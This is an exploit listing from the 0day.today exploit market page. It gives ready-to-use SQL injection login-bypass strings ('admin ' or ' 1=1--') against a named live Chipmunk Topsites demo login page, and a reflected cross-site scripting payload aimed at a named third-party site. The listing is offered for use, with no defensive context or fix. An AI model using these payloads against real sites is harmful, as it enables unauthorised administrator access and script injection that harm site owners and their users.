[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Chipmunk Topsites (Auth Bypass/XSS) Multiple Remote Vulnerabilities

Author
ZoRLu
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-4253
Category
web applications
Date add
25-11-2008
Platform
unsorted
===================================================================
Chipmunk Topsites (Auth Bypass/XSS) Multiple Remote Vulnerabilities
===================================================================


[~] Chipmunk Topsites (Auth Bypass) SQL Injection & XSS Multiple Remote Vuln.
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu   
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~]
[~] N0T: RedHaK Kardesime ozel tesekurler.
[~] -----------------------------------------------------------

Exploit:

username: [real_admin_name] ' or ' 1=1

password: ZoRLu ( or dont write anything )

note: generally admin name: admin 


exploit for demo:

http://www.chipmunk-scripts.com/topsites/login.php

username: admin ' or ' 1=1--

passwd: ZoRLu  ( or dont write anything )

or 

username: zorlu ' or ' 1=1--

passwd: ZoRLu  ( or dont write anything )


XSS:

http://www.arcade-classics.net/top100/index.php?start="><script>alert()</script>

[~]----------------------------------------------------------------------



#  0day.today [2024-10-05]  #